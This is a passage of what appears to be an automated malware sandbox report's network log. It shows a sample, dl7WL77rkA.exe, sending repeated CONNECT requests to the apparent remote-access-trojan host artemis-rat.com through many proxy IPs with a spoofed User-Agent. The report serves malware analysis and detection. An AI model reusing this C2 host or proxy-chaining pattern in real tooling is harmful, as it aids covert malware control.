                                                                                                                                                                                                                                                            Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.250914097 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                                                                                                                                                                                            Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1890192.168.2.55516645.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.761899948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1891192.168.2.553580128.199.196.31388323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.768131018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811305046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905221939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1892192.168.2.55362441.254.53.7019813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.768131971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.811367035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.066178083 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1893192.168.2.555170194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.768392086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1894192.168.2.55517243.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.784603119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1895192.168.2.555171212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.826857090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1896192.168.2.5551748.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.827816963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1897192.168.2.55517345.11.95.16550283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828234911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1898192.168.2.553870125.227.225.15733893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828239918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1899192.168.2.553760192.252.208.70142823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828489065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1900192.168.2.554702188.166.170.3280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.828797102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.159920931 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.972206116 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:16.868242979 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:18.628177881 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:22.148991108 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:29.316380024 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:43.396538973 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:12.836508036 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1901192.168.2.555175123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.836891890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1902192.168.2.555201104.25.231.184803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.844285011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.998533010 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1903192.168.2.555194162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.845602036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1904192.168.2.55518346.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.862692118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1905192.168.2.55517779.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.862847090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1906192.168.2.554698190.120.250.739993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.862976074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.905141115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.999330997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.092802048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1907192.168.2.55517631.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.863184929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1908192.168.2.554216112.30.155.83127923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.863645077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.821588993 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.115578890 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1909192.168.2.554593102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.871108055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1910192.168.2.555191194.4.50.127123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.876390934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1911192.168.2.55518145.11.95.16550473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.897392035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1912192.168.2.5551848.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.897478104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1913192.168.2.55518093.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.924705029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1914192.168.2.555212172.67.209.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.926901102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.102104902 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1915192.168.2.551693177.153.33.94803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.931694031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092444897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.202137947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.202193022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1916192.168.2.555250195.201.19.844433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.935340881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1917192.168.2.55368751.79.87.144412303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.942265034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1918192.168.2.55414972.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.960963011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
